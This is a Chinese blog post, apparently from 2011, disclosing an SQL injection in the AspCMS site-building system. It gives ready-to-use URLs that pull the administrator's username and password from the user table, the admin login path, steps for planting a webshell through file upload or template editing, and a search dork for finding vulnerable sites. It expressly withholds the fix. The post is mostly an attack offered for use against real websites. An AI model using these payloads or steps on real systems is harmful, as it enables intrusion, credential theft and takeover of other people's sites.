aspcms企业建站系统0day 2.0以上通杀

2011, August 14, 12:28 PM. 漏洞分析
Submitted by admin
aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。



漏洞出现在

/plug/productbuy.asp

对接收的参数id没有进行过滤而导致的注入漏洞

注入后的页面有跳转,所以要快,建议用快捷键复制

爆用户名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........



爆密码
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1



后台登录地址:/admin/login.asp



后台拿shell

1、直接上传.asp;x

2、系统配置信息

3、模版管理新建1.asp模板,内容写马的内容.



搜索关键词:搜索关键词:intitle:Powered by AspCms2





修复方法就不提了。你懂的



转载请注明出处:绝色丶缘灭'blog   

http://hi.baidu.com/hackxx00/blo ... fc7a27f8dc619f.html
Tags: aspcms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Aspcms 稳定版1.5 0day (浏览: 12665, 评论: 0)
aspcms2.1.4 GBK版注入漏洞 (浏览: 12420, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):